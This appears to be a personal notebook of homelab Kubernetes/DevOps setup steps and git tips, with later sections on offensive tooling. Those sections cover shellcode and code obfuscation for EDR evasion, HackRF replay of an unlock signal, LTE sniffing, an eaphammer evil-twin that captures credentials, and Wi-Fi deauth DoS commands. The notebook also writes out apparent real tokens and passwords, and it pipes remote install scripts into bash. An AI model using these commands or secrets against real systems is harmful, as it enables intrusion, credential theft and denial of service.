This all means that if we run a job such as run: docker build ... (which runs inside the main runner container runner-images) we will utilize all variables and options that we passed to gitea-actions-act-runner inside it’s helm values, but when we run jobs that create their own separate container (such as docker/setup-buildx-action), options we specified earlier are not known to them (meaning, network will not be host’s). This is why you need to add the network=host option when running buildx jobs. Same things goes for certificates. Since we only have /etc/ssl/certs/ca-certificates.crt file containing our internal root CA certificate, instead of having this certificate stored separately, we would need to mount it separately into dind:

kubectl -n gitea patch statefulset gitea-actions-act-runner --type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/1/volumeMounts/-",
    "value": {
      "name": "internal-ca",
      "mountPath": "/etc/ssl/certs/internal-ca.crt",
      "subPath": "ca.crt",
      "readOnly": true
    }
  }
]'
  - name: Set up Docker Buildx
    uses: docker/setup-buildx-action@v3
    with:
      driver-opts: |
        network=host
      config-inline: |
        [registry."harbor.aperture.ad"]
          ca=["/etc/ssl/certs/internal-ca.crt"]

migrate from valkey-cluster to valkey

I was getting segfault crashes on my valkey-cluster pods

helm upgrade --install gitea gitea-charts/gitea \
--namespace gitea \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set persistence.storageClass='rook-ceph-block' \
--set postgresql.primary.persistence.storageClass='rook-ceph-block' \
--set gitea.config.server.ROOT_URL=https://gitea.aperture.ad/ \
--set valkey-cluster.enabled=false \
--set valkey.enabled=true \
--set valkey.persistence.storageClass='rook-ceph-block'

Monitoring

Prometheus & Grafana

Setup

kubectl create namespace monitoring
kubectl label namespace monitoring istio-injection=enabled
kubectl label --overwrite namespace monitoring \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm install prometheus prometheus-community/prometheus --namespace monitoring

helm repo add grafana https://grafana.github.io/helm-charts
helm install grafana grafana/grafana \
--namespace monitoring \
--set persistence.enabled=true

kubectl apply -f grafana-ingress.yaml

# get passwd
kubectl get secret --namespace monitoring grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo

login via admin:passwd Add node exporter dashboard Add prometheus data source with http://prometheus-server.monitoring.svc.cluster.local

Grafana authentik integration requires values.yaml modification, ao i will refer to Authentik docs to undate the deployment:

kubectl create secret generic grafana-authentik-secret -n monitoring --from-literal=client_secret='REDACTED'

# we will make gitea use root CA for it to trust authentik
kubectl label namespace monitoring use-internal-ca=true
kubectl -n monitoring edit deployment grafana
# spec:
#   template:
#     spec:
#       volumes:
#         - name: internal-ca
#           configMap:
#             name: internal-root-ca
#       containers:
#         - env:
#           name: grafana
#           volumeMounts:
#             - name: internal-ca
#               mountPath: /etc/ssl/certs/internal-ca.crt
#               subPath: ca.crt
#               readOnly: true

# as grafana is behind istio, we have to specify root_url, otherwise it redirects to localhost:3000
nvim grafana-values.yaml
# grafana.ini:
#   server:
#     root_url: https://grafana.aperture.ad
#   auth:
#     signout_redirect_url: "https://authentik.aperture.ad/application/o/grafana/end-session/"
#     oauth_auto_login: false
#   auth.generic_oauth:
#     name: authentik
#     enabled: true
#     client_id: "TiLrd2FQwovZOYfHdIm2DLk3i2QVQeXWjaYd4nW9"
#     client_secret: $__file{/etc/secrets/authentik/client_secret}
#     scopes: "openid profile email"
#     auth_url: "https://authentik.aperture.ad/application/o/authorize/"
#     token_url: "https://authentik.aperture.ad/application/o/token/"
#     api_url: "https://authentik.aperture.ad/application/o/userinfo/"
# 
# extraSecretMounts:
#   - name: authentik-secret
#     secretName: grafana-authentik-secret
#     mountPath: /etc/secrets/authentik
#     readOnly: true
# extraConfigmapMounts:
#   - name: internal-ca
#     configMap: internal-root-ca
#     mountPath: /etc/ssl/certs/internal-ca.crt
#     subPath: ca.crt
#     readOnly: true

helm upgrade grafana grafana/grafana -n monitoring --set persistence.enabled=true -f grafana-values.yaml

CD

FluxCD

Setup

Gitea integration

Bootstrap command creates kustomization repository, installs flux operator into kubernetes under flux-system namespace Note: if you want to uninstall flux just run flux uninstall

# install fluxcd CLI
curl -s https://fluxcd.io/install.sh | sudo bash

# Settings -> Applications -> Create token
# Also, for some reason i was able to create it first using --insecure-skip-tls-verify, but then recreated it
flux bootstrap gitea \
--token-auth \
--owner=alex.dvorak \
--repository=flux-kustomization-repo \
--branch=main \
--path=clusters/aperture \
--personal \
--hostname gitea.aperture.ad \
--certificate-authority $PATH_TO_API_SERVER_CERT \
--ca-file $PATH_TO_GITEA_CERT
# Please enter your Gitea personal access token (PAT): 0f2cbf55fb1cb8f47209aca6923d21025bf8c141

~#   git clone https://$USER:$PAT@gitea.aperture.ad/$USER/flux-kustomization-repo
cd flux-kustomization-repo

# create an application source ()
flux create source git gfub \
--url=https://gitea.aperture.ad/alex.dvorak/GFUB \
--branch=main \
--interval=1m \
--export > ./clusters/aperture/gfub-source.yaml

git add -A && git commit -m "Add GFUB GitRepository" && git push

# make sure names match (name of git source "gfub" and --source "gfub")
flux create kustomization gfub \
--target-namespace=gfub \
--source=gfub \
--path="./kustomize" \
--prune=true \
--wait=true \
--interval=30m \
--retry-interval=2m \
--health-check-timeout=3m \
--export > ./clusters/aperture/gfub-kustomization.yaml

git add -A && git commit -m "Add GFUB Kustomization" && git push

FluxCD will reset all labels and modifications to deployments and other resources, so in order to add our CA to containers we must patch them. Resources are contained within fluxcd’s gotk-components.yaml file that contains Namespace, Deployment definintions and CRDs. In order to patch it we need to define kustomization: https://fluxcd.io/flux/installation/configuration/bootstrap-customization/

apiVersion: kustomize.config.k8s.io/v1beta1
: Kustomization
urces:
gotk-components.yaml
gotk-sync.yaml
hes:
patch: |
  - op: add
    path: /metadata/labels/use-internal-ca
    value: "true"
target:
  kind: Namespace
  labelSelector: "app.kubernetes.io/part-of=flux"

patch: |
  - op: add
    path: /spec/template/spec/volumes/-
    value:
      name: internal-root-ca
      configMap:
        name: internal-root-ca

  - op: add
    path: /spec/template/spec/volumes/-
    value:
      name: ca-store
      emptyDir: {}

  - op: add
    path: /spec/template/spec/containers/0/volumeMounts/-
    value:
      name: ca-store
      mountPath: /etc/ssl/certs/

  - op: add
    path: /spec/template/spec/initContainers
    value: []

  - op: add
    path: /spec/template/spec/initContainers/-
    value:
      name: build-ca
      image: docker.io/fluxcd/flux:1.17.0
      imagePullPolicy: IfNotPresent
      command:
        - /usr/sbin/update-ca-certificates
      volumeMounts:
        - mountPath: /usr/local/share/ca-certificates/
          name: internal-root-ca
          readOnly: true
        - mountPath: /etc/ssl/certs/
          name: ca-store
target:
  kind: Deployment
  name: "source-controller"
git add -A && git commit -m "modify resources" && git push

# wait
flux get kustomizations --watch

Now we get kustomization path not found: stat /tmp/kustomization-393043959/kustomize: no such file or directory, this is because we set ./kustomize path and flux expects manifests inside this path within our GFUB repository in order to deploy the project to kubernetes.

IdP

Authentik

Setup with gitea

nvim authentic-values.yaml
# authentik:
#   secret_key: "somekey"
#   # This sends anonymous usage-data, stack traces on errors and
#   # performance data to sentry.io, and is fully opt-in
#   error_reporting:
#     enabled: true
#   postgresql:
#     password: "somepass"
# 
# postgresql:
#   enabled: true
#   auth:
#     password: "somepass"
# redis:
#   enabled: true

helm upgrade --install authentik authentik/authentik \
--namespace authentik \
-f authentik-values.yaml

nvim authentik-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: authentik-gateway
#   namespace: authentik
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "authentik.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "authentik.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: authentik-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: authentik
#   namespace: authentik
# spec:
#   hosts:
#     - "authentik.aperture.ad"
#   gateways:
#     - authentik-gateway
#   http:
#     - match:
#         - uri:
#             prefix: /
#       route:
#         - destination:
#             host: authentik.svc.cluster.local
#             port:
#               number: 80
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: authentik-cert
#   namespace: istio-system
# spec:
#   secretName: authentik-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: authentik.aperture.ad
#   dnsNames:
#     - authentik.aperture.ad


kubectl apply -f authentik-ingress.yaml

Access authentik by navigating to https://authentik.aperture.ad/if/flow/initial-setup/ Add gitea provider and add gitea application, assign the provider to an application.

Registries

Harbor

Setup

kubectl create namespace harbor
kubectl label namespace harbor istio-injection=enabled

# make sure to use tun throne
helm repo add harbor https://helm.goharbor.io

helm upgrade --namespace harbor --install harbor harbor/harbor --set expose.type=clusterIP --set expose.clusterIP.name=harbor --set expose.tls.enabled=false --set externalURL=https://harbor.aperture.ad

cat harbor-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: harbor-gateway
#   namespace: harbor
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "harbor.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "harbor.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: harbor-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: harbor
#   namespace: harbor
# spec:
#   hosts:
#     - "harbor.aperture.ad"
#   gateways:
#     - harbor-gateway
#   http:
#     - match:
#         - port: 443
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: harbor.harbor.svc.cluster.local
#             port:
#               number: 80
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: harbor-cert
#   namespace: istio-system
# spec:
#   secretName: harbor-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: harbor.aperture.ad
#   dnsNames:
#     - harbor.aperture.ad

kubectl apply -f harbor-ingress.yaml

docker login https://harbor.aperture.ad
# Username: admin
# Password:

Nexus

Setup

8384 port is an additional HTTPS port for Docker

kubectl create namespace nexus
kubectl label namespace nexus istio-injection=enabled

helm repo add sonatype https://sonatype.github.io/helm3-charts/
helm upgrade --install --namespace nexus nexus-repo sonatype/nexus-repository-manager

nvim nexus-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: nexus-gateway
#   namespace: nexus
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: nexus-tls
#     - port:
#         number: 8384
#         name: https-8384
#         protocol: HTTPS
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: nexus-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: nexus
#   namespace: nexus
# spec:
#   hosts:
#     - "nexus.aperture.ad"
#   gateways:
#     - nexus-gateway
#   http:
#     - match:
#         - port: 443
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: nexus-repo-nexus-repository-manager.nexus.svc.cluster.local
#             port:
#               number: 8081
#     - match:
#         - port: 8384
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: nexus-repo-nexus-repository-manager.nexus.svc.cluster.local
#             port:
#               number: 8384
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: nexus-cert
#   namespace: istio-system
# spec:
#   secretName: nexus-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: nexus.aperture.ad
#   dnsNames:
#     - nexus.aperture.ad


kubectl apply -f nexus-ingress.yaml

kubectl -n nexus patch service nexus-repo-nexus-repository-manager \
--type='json' -p='[{"op": "replace", "path": "/spec/ports/0/name", "value": "http-nexus"}]'

kubectl -n istio-system patch svc istio-ingressgateway --type='json' -p='[
  {
    "op": "add",
    "path": "/spec/ports/-",
    "value": {
      "name": "https-8384",
      "port": 8384,
      "targetPort": 8384,
      "protocol": "TCP"
    }
  }
]'

kubectl -n nexus patch svc nexus-repo-nexus-repository-manager --type='json' -p='[
  {
    "op": "add",
    "path": "/spec/ports/-",
    "value": {
      "name": "https-8384",
      "port": 8384,
      "targetPort": 8384,
      "protocol": "TCP"
    }
  }
]'

kubectl -n nexus exec -it pod/nexus-repo-nexus-repository-manager-55b69ddd87-nlxth -- cat /nexus-data/admin.password

Secrets Management

Vault

Setup

Integrate with K8s

# enable (create) a new KV (v2) secrets engine under k8s/prod/gfub 
vault secrets enable -path=k8s -version=2 kv

# store secrets (store in batch, each `put` does an override)
vault kv put k8s/prod/gfub/atsvc \
JWT_SECRET_KEY="da0a56e4c80c7aa7f93aad7452efdec2f759f915xl38dan" \
DATABASE_PASSWORD="sohd801h08h10fhv1" \
APPLICATION_URL="https://atsvc.com" \
SPRING_PROFILES_ACTIVE="dev" \
DATABASE_USERNAME="admin" \
DATABASE_URL="jdbc:postgresql://db:5432/atsvc" \
REDIS_HOST="redis" \
REDIS_PORT="6379" \
POSTGRES_USER="admin" \
POSTGRES_PASSWORD="sohd801h08h10fhv1" \
POSTGRES_DB="atsvc"

# verify
vault kv get k8s/prod/gfub/atsvc

Install external secrets

helm repo add external-secrets https://charts.external-secrets.io
helm repo update

helm install external-secrets external-secrets/external-secrets \
--namespace external-secrets \
--create-namespace

Note: The ExternalSecret specifies what to fetch, the SecretStore specifies how to access. https://external-secrets.io/main/api/externalsecret/ https://external-secrets.io/main/api/secretstore/

???
cat external-secrets.yaml
# ---
# apiVersion: external-secrets.io/v1
# kind: SecretStore
# metadata:
#   name: vault-backend
# spec:
#   provider:
#     vault:
#       server: "https://vault.aperture.ad:8200"
#       path: k8s #?
#       version: v2
#       auth:
#         tokenSecretRef:
#           name: vault-token
#           namespace: gfub
#           key: token
#       caProvider:
#         type: ConfigMap
#         name: internal-root-ca
#         key: "ca.crt"
# ---
# apiVersion: external-secrets.io/v1
# kind: ExternalSecret
# metadata:
#   name: prod-gfub
#   namespace: gfub
# spec:
#   refreshInterval: 1m
#   secretStoreRef:
#     name: vault-backend
#     kind: SecretStore
#   target:
#     name: prod-gfub
#   data:
#     - secretKey: JWT_SECRET_KEY
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: JWT_SECRET_KEY
#     - secretKey: DATABASE_PASSWORD
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_PASSWORD
#     - secretKey: APPLICATION_URL
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: APPLICATION_URL
#     - secretKey: SPRING_PROFILES_ACTIVE
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: SPRING_PROFILES_ACTIVE
#     - secretKey: DATABASE_USERNAME
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_USERNAME
#     - secretKey: DATABASE_URL
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_URL
#     - secretKey: REDIS_HOST
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: REDIS_HOST
#     - secretKey: REDIS_PORT
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: REDIS_PORT
#     - secretKey: POSTGRES_USER
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_USER
#     - secretKey: POSTGRES_PASSWORD
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_PASSWORD
#     - secretKey: POSTGRES_DB
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_DB
kubectl create namespace gfub

cat ./gfub-policy.hcl
# path "k8s/data/prod/gfub/atsvc" {
#   capabilities = ["read", "list"]
# }
#
# path "k8s/metadata/prod/gfub/atsvc" {
#   capabilities = ["read", "list"]
# }

vault policy write gfub-policy ./gfub-policy.hcl

vault token create -policy=gfub-policy -period=0 -orphan
# token: $TOKEN

kubectl create secret generic vault-token --namespace gfub --from-literal=token="$TOKEN"

kubectl apply -f ./external-secrets.yaml
kubectl label namespace gfub use-internal-ca=true

# verify
kubectl -n gfub get externalsecret
kubectl -n gfub get secret

Fix certificate issues when external-secrets operator tries to connect to vault:

kubectl label namespace external-secrets use-internal-ca=true

Configure secret for kubernetes to be able to pull image from private harbor repo and allow default SA to use that secret:

kubectl create secret docker-registry reg-token --docker-server=https://harbor.aperture.ad/ --docker-username=kubernetes --docker-password="coolpasswd" --docker-email="kubernetes@aperture.ad"
kubectl patch serviceaccount default -p '{"imagePullSecrets": [{"name": "reg-token"}]}'

Setup on Proxmox

Install Hashicorp Vault to an external server. I will use docker community script to dep https://community-scripts.github.io/ProxmoxVE/scripts?id=docker&category=Containers+%26+Docker

export $(grep -v '^#' .env | xargs)
ssh -i $TF_VAR_pve_ssh_key_path root@pve.aperture.ad

bash -c "$(curl -fsSL https://raw.githubusercontent.com/community-scripts/ProxmoxVE/main/ct/docker.sh)"
# select advanced install, choose root passwd and configure ssh key
# add compose plugin
# ......... installation completed
exit

I will now generate certs for vault on my workstation:

openssl genrsa -out vault.aperture.ad.key 4096

cat > vault.aperture.ad.cnf <<EOF
[req]
default_bits = 4096
prompt = no
default_md = sha256
distinguished_name = dn
req_extensions = req_ext

[dn]
CN = vault.aperture.ad

[req_ext]
subjectAltName = @san

[san]
DNS.1 = vault.aperture.ad
EOF

# on WS
openssl req -new \
-key vault.aperture.ad.key \
-out vault.aperture.ad.csr \
-config vault.aperture.ad.cnf

openssl x509 -req \
-in vault.aperture.ad.csr \
-CA k8s-aperture-root-ca.crt \
-CAkey k8s-aperture-root-ca.key \
-CAcreateserial \
-out vault.aperture.ad.crt \
-days 825 \
-sha256 \
-extensions req_ext \
-extfile vault.aperture.ad.cnf

sftp -i vault root@vault.aperture.ad
> put certificates/vault.aperture.ad.crt /root/vault/certs/server.crt
> put certificates/vault.aperture.ad.key /root/vault/certs/server.key
> put certificates/k8s-aperture-root-ca-01.crt /usr/local/share/ca-certificates/

After docker LXC installation, exit proxmox ssh and ssh into docker LXC.

update-ca-certificates

mkdir -p $HOME/vault/{config,file,logs,certs}
cd $HOME/vault/certs/

cd $HOME/vault
cat <<EOF > docker-compose.yaml
version: '3.3'
services:
  vault:
    image: hashicorp/vault
    container_name: vault-new
    environment:
      VAULT_ADDR: "https://vault.aperture.ad:8200"
      VAULT_API_ADDR: "https://vault.aperture.ad:8200"
      VAULT_ADDRESS: "https://vault.aperture.ad:8200"
      # VAULT_UI: true
      # VAULT_TOKEN:
    ports:
      - "8200:8200"
      - "8201:8201"
    restart: always
    volumes:
      - ./logs:/vault/logs/:rw
      - ./data:/vault/data/:rw
      - ./config:/vault/config/:rw
      - ./certs:/certs/:rw
      - ./file:/vault/file/:rw
    cap_add:
      - IPC_LOCK
    entrypoint: vault server -config /vault/config/config.hcl
EOF

cd $HOME/vault/config
cat <<EOF > config.hcl
ui = true
disable_mlock = "true"

storage "raft" {
  path    = "/vault/data"
  node_id = "node1"
}

listener "tcp" {
  address = "[::]:8200"
  tls_disable = "false"
  tls_cert_file = "/certs/server.crt"
  tls_key_file  = "/certs/server.key"
}

api_addr = "https://vault.aperture.ad:8200"
cluster_addr = "https://vault.aperture.ad:8201"
EOF

cd $HOME/vault
docker compose up -d

# Exec into the vault container
docker exec -it vault-new /bin/sh

# Once logged into the vault container
vault operator init
# store the unseal keys and the token outputted

# run the following in the container, entering 3 different unseal keys
vault operator unseal
vault operator unseal
vault operator unseal

# install vault on your workstation
export VAULT_ADDR="https://vault.aperture.ad:8200"
vault login
# Token (will be hidden):

IDE & git

git

ambigious fix

# list refs
git show-ref master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/heads/master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/origin/master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/remotes/origin/HEAD
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/remotes/origin/master
### ^^^ how it should normally look

# delete a weird ref locally if you see one
git update-ref -d refs/remotes/origin/origin/origin/master

# delete weird ref remotely
git push origin --all --prune

create orphan repo

git checkout --orphan main
git add . && git commit -m 'initial'
git push origin main

merge from development branch without commit history

# switch to master
git checkout master
# merge without commit history
git merge --squash dev
git commit --all -m 'commit'
git push origin master

merge without merge commit

# create feature branch
git checkout -b feature/foo master

# make some commits

# rebase current feature branch to match master's commit history
git rebase master

# switch to master
git checkout master

# merge only fast-forward commits
git merge --ff-only feature/foo
### in order to merge without commit history at all use --squash
git merge --squash feature/foo

# -d (safe delete) ensure only fully merged branches are deleted
git branch -d feature/foo

push using PAT via HTTPS

git remote add origin https://username:thisismypattoken@gitea.aperture.ad/username/proj.git

stash

# stash changes in the current branch
git stash

# list stashed changes
git stash list
# inspect stashed changes
git stash show

# apply stashed changes
git stash apply

mingw

clangd w mingw

While setting up C crossdev environment on GNU/Linux for Microsoft Windows you may face an issue with clangd stating “Only Win32 target is supported!”. Even after you include the correct-architecture directory in CompileFlags for header search with -I compiler flag, do not forget to change the compiler itself by specifying the “Compiler” key in project’s .clangd configuration file.

CompileFlags:
    Add: [-I/usr/lib/mingw64-toolchain/x86_64-w64-mingw32/include]
    Compiler: /usr/lib/mingw64-toolchain/bin/x86_64-w64-mingw32-c++

The error appears because of the #if directive statement checking

clangd --check=./main.cpp 2>&1 | grep 'E\['

nvim

inline latex rendering support

  • ensure snacks.nvim is installed and you are using a supported terminal for graphics (such as kitty)
  • install pdflatex, texlive-collection-latexextra and texlive-standalone (fedora) or just texlive-full (debian)
  • install mermaid-cli using sudo npm install -g @mermaid-js/mermaid-cli
  • sudo npm install -g tree-sitter-cli
  • :TSInstall latex

You can now test it using neorg for example:

@math
\[
\LaTeX \text{ is W}
\]
@end

$n = 7 \implies \phi(7) = \#\{1,2,3,4,5,6\} = 6$

Obfuscation

Codecepticon

Usage

# install prerequisites  (.NET VSC, Roslyn)
git clone https://github.com/sadreck/Codecepticon.git
cd Codecepticon/Codecepticon
dotnet build

### --path should be a path to an sln !!!
### thus, generate an sln and add your project as a reference to that sln :
# VSCommunity => File => New => Project => Empty Solution
# VSCommunity => File => Add => Existing Project
# VSCommunity => Build => Publish Selection                       # needed in order for reference to appear in .sln

# obfuscate
cd Codecepticon/Codecepticon/bin/Debug/net472/
.\Codecepticon.exe --action obfuscate --module csharp --verbose --path "C:\Users\Administrator\Downloads\repos\Solution1\Solution1.sln" --rename ncefpavs --rename-method markov --markov-min-length 3 --markov-max-length 9 --markov-min-words 3 --markov-max-words 4

OLLVM

Build

FROM ubuntu:18.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y \
    build-essential \
    git \
    cmake \
    python \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /usr/src
RUN git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git

WORKDIR /usr/src/build

RUN cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_INCLUDE_TESTS=OFF ../obfuscator/

RUN make -j$(nproc)

RUN ./bin/clang --version

CMD ["/bin/bash"]
sudo docker build -t obfuscator-llvm .
sudo docker cp $CONTAINER_ID:/usr/src/build/bin ~/utils/ollvm/
sudo docker cp $CONTAINER_ID:/usr/src/build/lib ~/utils/ollvm/
sudo docker cp $CONTAINER_ID:/usr/src/build/include ~/utils/ollvm/

PIC

SGN

Usage

docker pull egee/sgn
ls ~/utils/shellcode.bin
docker run -it -v ~/utils:/data egee/sgn -a 64 /data/shellcode.bin
ls ~/utils/shellcode.bin.sgn

garble

Usage

go install mvdan.cc/garble@latest

# `go build ...` ->
garble -literals -tiny build ...

vs EDR

WPF abuse to silence an agent

Runtime obfuscation

active return address spoofing (synthetic stackframes, moonwalk)

https://github.com/NtDallas/Draugr https://github.com/HulkOperator/Spoof-RetAddr

RF

ADSB

General

Replay

HackRF

# capture on 315'000.000kHz (315.000 MHz) and save to a file called "unlock.rx" and sample rate of 2'000.000 kHz (2 MHz)
sudo hackrf_transfer -s 2000000 -f 315000000 -r unlock.rx

# transmit file contents with 47 db (maximum) gain
sudo hackrf_transfer -s 2000000 -f 315000000 -t unlock.rx -x 47

Resources

Spectrum analysis

General

HackRF

hackrf_sweep can be manually called as follows:

hackrf_sweep -f 1800:1900 -r output.csv

QSpectrumAnalyzer is more convenient to use. File -> Settings -> Backend == hackrf_sweep to use hackrf_sweep. Tested on hackrf FW 2024.02.1

Utils

HackRF

flash

grab from here - https://github.com/mossmann/hackrf

# just run the following command and reconnect the board
sudo hackrf_spiflash -w firmware-bin/hackrf_one_usb.bin

# run to ensure firmware got flashed
sudo hackrf_info

Flash dump

Native

esptool

# display info about the chip (including the flash size which is important)
sptool.py --chip esp8266 --port /dev/ttyUSB0 flash_id
# Manufacturer: 68
# Device: 4016
# Detected flash size: 4MB

# dump flash memory to a file called full_flash.bin (0x400000 == 4MB)
sptool.py --chip esp8266 --port /dev/ttyUSB0 read_flash 0x00000 0x400000 full_flash.bin

Cellular

LTE sniffing

LTESniffer Setup in docker

https://github.com/SysSec-KAIST/LTESniffer

  1. Compile:
FROM ubuntu:20.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y \
    build-essential \
    git \
    cmake \
    libfftw3-dev \
    libmbedtls-dev \
    libboost-all-dev \
    libconfig++-dev \
    libsctp-dev \
    libglib2.0-dev \
    libudev-dev \
    libcurl4-gnutls-dev \
    qtdeclarative5-dev \
    libqt5charts5-dev \
    python3-dev \
    python3-mako \
    python3-numpy \
    python3-requests \
    python3-setuptools \
    python3-ruamel.yaml \
    libhackrf-dev \
    libsoapysdr-dev \
    soapysdr-module-hackrf \
    soapysdr-tools \
    hackrf \
    automake \
    libncurses5-dev \
    libusb-1.0-0-dev \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /root
RUN git clone https://github.com/EttusResearch/uhd.git && \
    cd uhd && \
    # Checkout a stable 4.x release
    git checkout v4.6.0.0 && \
    cd host && \
    mkdir build && \
    cd build && \
    cmake .. && \
    make -j$(nproc) && \
    make install && \
    ldconfig

WORKDIR /root
RUN git clone https://github.com/SysSec-KAIST/LTESniffer.git && \
    cd LTESniffer && \
    mkdir build && \
    cd build && \
    cmake ../ && \
    make -j$(nproc)

WORKDIR /root/LTESniffer/build/src
CMD ["/bin/bash"]
docker build -t ltesniffer-hackrf .
  1. Pass the device to a container (determine IDs from lsusb, e.g. Bus 001 Device 060: HackRF)
docker run -it --rm \
  --device=/dev/bus/usb/001/060 \
  -v ~/test/ltesniffer/data:/data \
  ltesniffer-hackrf
  1. Ensure device is recognized
SoapySDRUtil --probe="driver=hackrf"
  1. Determine downlink frequency e.g. via Cellular-Z. (cellular-z displays it as FREQ downlink/uplink)

  2. Launch

# -A Number of RX antennas [Default 1]
# -W Number of concurent threads [2..W, Default 4]
# -C Enable cell search, default disable
# -m Sniffer mode, 0 for downlink sniffing mode, 1 for uplink sniffing mode
# -g RF fix RX gain [Default AGC]
# -f Downlink Frequency
# -a RF args [Default ]

# considering the downlink frequency determined is 1845.2 MHz
./LTESniffer -f 1845.2e6 -m 0 -g 60 -a "driver=hackrf"

WiFi

Misc

put into promiscuous

# place an interface (wireless card into monitor)
airmon-ng start wlan0

### ALTERNATIVELY:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

set a specific channel to a wireless interface

iwconfig wlp1s0f0u8 channel 5

WPA-E ET

eaphammer --cert-wizard
# make sure all is checked out

# working. if certificate validation 
# is not configured on supplicant -
# supplicant autoconnects and gets 
# successfully downgraded to GTC if MSCHAPv2
# is not explicitly specified
./eaphammer --bssid 1C:7E:E5:97:79:B1 \
--essid Example \
--channel 2 \
--interface wlan0 \
--auth wpa-eap \
--creds

IMPACT:

  • inner GTC : plaintext credentials if
  • inner MSCHAPv2 : NetNTLMv1 hash

airodump-ng

  1. use “a” key to collapse sections!
  2. if doesn’t work try replugging the adapter! It SHOULD work right after replugging by just runnign airodump-ng! No additional actions!
### SECTIONS
## APs:
# BSSID   - AP MAC address
# ESSID   - AP readable identitier
# CH      - AP channel (frequency range)

## STATIONS:
# BSSID   - MAC of an AP the station is connected to
# Probes  - ESSIDs this client has probed 
# STATION - MAC of a station


###############
### GENERAL ###
###############
# scan near APs
airodump-ng wlan0
# scan specific AP
airodump-ng --bssid CE:9D:A2:E2:9B:40 wlan0

deauth

  1. Usually it takes a client 3-5 seconds to authenticate back. that means you can easily DoS.
  2. before sending ensure your interface is set to a single channels (not hopping channels). It can hop channels if you are simultaniously monitoring with airmon-ng, so disable it first (or start it with “-c” parameter and set the channel manually (e.g. -c 11)) and set a channel with iwconfig.
# send unicast deauth frame against a specific station (client) 
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" -c "10:F0:05:16:F6:9E" wlp1s0f0u8

# send broadcast deauth frame impersonating an AP
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" wlp1s0f0u8

Serial

UART

FTDI FT232H

DOC: breakout pinout

sudo su
python3 -m venv ./
. ./bin/activate

# <https://eblot.github.io/pyftdi/installation.html>
pip install pyftdi

# determine URL
sudo ./bin/ftdi_urls.py

pyftdi provides a ready-to-use utility for UART communication

python3 bin/pyterm.py ftdi://ftdi:232h:1:46/1

Generic

  • TX - RX
  • RX - TX
  • GND - GND
ls -ltr /dev/*USB*

sudo picocom -b 115200 /dev/ttyUSB0

UEFI

EFI shell

Installation

Installing EFI shell:

